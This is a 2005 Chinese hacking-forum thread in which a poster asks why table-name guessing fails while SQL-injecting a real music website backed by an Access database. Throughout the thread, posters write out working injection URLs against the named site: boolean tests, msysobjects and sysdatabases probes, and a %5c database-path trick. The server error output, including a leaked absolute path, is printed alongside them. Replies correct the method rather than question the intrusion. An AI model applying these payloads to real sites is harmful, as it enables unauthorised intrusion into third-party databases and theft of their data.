议题提交：Yaqilles
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

access数据库在注入时表名为空的现象我遇到了好多次了！
下面是我多一个站的注入出现的次现象
http://www.xxxxx.cn/music/Singer1.Asp?id=1522'(为保护网站所以用星号表示）
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误 在查询表达式 'NclassID=1522' order by hits desc' 中。

/music/Singer1.Asp，行83
这 我都看了是正确的。
http://www.xxxxx.cn/music/Singer1.Asp?id=1522%20and%201=1
正常返回
http://www.iein.cn/music/Singer1.Asp?id=1522%20and%201=2
和前一页不同
http://www.iein.cn/music/Singer1.Asp?id=1522%20;
在这我还实验了“；”返回
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 在 SQL 语句结尾之后找到字符。

/music/Singer1.Asp，行83
http://www.iein.cn/music/Singer1.Asp?id=1522%20；and%20user>0
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e10'
[Microsoft][ODBC Microsoft Access Driver] 参数不足，期待是 1。

/music/Singer1.Asp，行83

http://www.iein.cn/music/Singer1.Asp?id=1522%20;and%20(select%20count(*)from%20msysobjects)>0
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 在 SQL 语句结尾之后找到字符。

/music/Singer1.Asp，行83
返回的还是
http://www.iein.cn/music/Singer1.Asp?id=1522;and (select count(*)from sysobjects)>0
返回
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 在 SQL 语句结尾之后找到字符。

/music/Singer1.Asp，行83
到这都知道是 ACCESS数据库了！可是在猜他表名的时候就有问题了！
http://www.iein.cn/music/Singer1.Asp?id=1522%20;and%20(select%20count(*)from%20admin)>0
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 在 SQL 语句结尾之后找到字符。

/music/Singer1.Asp，行83
这是返回。就这样我把我能想到的想到的都猜过了！
想是可能是我自己经验的问题所以我用了好多的工具都是显示表名为空。
我想来不可能！数据库表空了？？不合理！！
所以在这希望各位高手解答！

引用:

下面是引用yaqilles于07-30-2005 16:15发表的[讨论]access injection遇到表名为空的问题:
到这都知道是 ACCESS数据库了！可是在猜他表名的时候就有问题了！
http://www.iein.cn/music/Singer1.Asp?id=1522%20;and%20(select%20count(*)from%20admin)>0
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 在 SQL 语句结尾之后找到字符。到了好多次了！
下面是我多一个站的注入出现的次现象
.......

为什么要在注入语句后面加";"
Access不支持多语句查询

http://www.iein.cn/music/Singer1.Asp?id=1522%20;and%20user>0

注入语句就有问题...哪有谁直接在;后面加and的语句的?
如果这样的话,在程序里拼接的字符串就类似
"select * from table where id=1552 ;and user >0"
本身这样的语句在SQL中查询就会出错的.
And more...
前面判断数据库类型的时候就很多余,因为出错提示直接告诉你是Access了.....

引用:

下面是引用yaqilles于07-30-2005 16:15发表的[讨论]access injection遇到表名为空的问题:
议题提交：Yaqilles
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

access数据库在注入时表名为空的现象我遇到了好多次了！
下面是我多一个站的注入出现的次现象
.......

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误 在查询表达式 'NclassID=1522' order by hits desc' 中。

第一步的时候都告诉是access数据库了吧

不知道楼主是什么意思

[Microsoft][ODBC Microsoft Access Driver] 在 SQL 语句结尾之后找到字符。  Access

";"为什么要加这个。。构造的注射语句就是错误地``

即便是SQL也并非完全支持;的

可是我用NB跑了测试也是一样！
能告诉是ACCESS数据库，可是猜出后表名是空的


那“；”是我自己的一个尝试，因为猜不到表名所以 我想用那一试，以前听一个ACCESS高手
提到过所以自己试了一试。

引用:

下面是引用yaqilles于07-30-2005 16:15发表的[讨论]access injection遇到表名为空的问题:
议题提交：Yaqilles
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

access数据库在注入时表名为空的现象我遇到了好多次了！
下面是我多一个站的注入出现的次现象
http://www.xxxxx.cn/music/Singer1.Asp?id=1522'(为保护网站所以用星号表示）
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误 在查询表达式 'NclassID=1522' order by hits desc' 中。

是用那AND 是有点多余了在提交了“'”后已经告诉了数据库！
是自己没看明白！

不太明白楼主的意思啊
“好多的工具都是显示表名为空。”是什么意思？是不是说注入工具把表名猜不出来？猜不出来很正常啊，表名很怪当然猜不出来，并不能说明那什么“数据库表空了”啊。

到楼主给的地址去看了看，好象完全不支持“;”，传说中的Sql-Dir无效了。
用http://www.iein.cn/music/Singer1.Asp?id=1522%20and%200<>(select%20count(*)%20from%20master.dbo.sysdatabases%20where%20name>1%20and%20dbid=6)试了试，想先暴库后再把表暴出来，结果出来这个：

Microsoft OLE DB Provider for ODBC Drivers 错误 &#39;80004005&#39;
[Microsoft][ODBC Microsoft Access Driver] 找不到文件 &#39;C:\WINNT\system32\master.dbo&#39;。

/music/Singer1.Asp，行83
库没出来，绝对路径出来了。

再用http://www.iein.cn/music%5cSinger1.Asp?id=1522暴库，出来这个：

Microsoft OLE DB Provider for ODBC Drivers 错误 &#39;80004005&#39;

[Microsoft][ODBC Microsoft Access Driver]常见错误 不能打开注册表关键字 &#39;Temporary (volatile) Jet DSN for process 0x7f4 Thread 0x7cc DBC 0xd0a1f6c Jet&#39;。

/music/conn.asp，行6

奇特。再在站上其他地方逛了逛，发现用%5c通常会暴出些莫名其妙的错误，或者是不报错却打开一些莫名其妙的页面。

是不是在搞笑，access数据库用mssql的方法注入，能有效吗？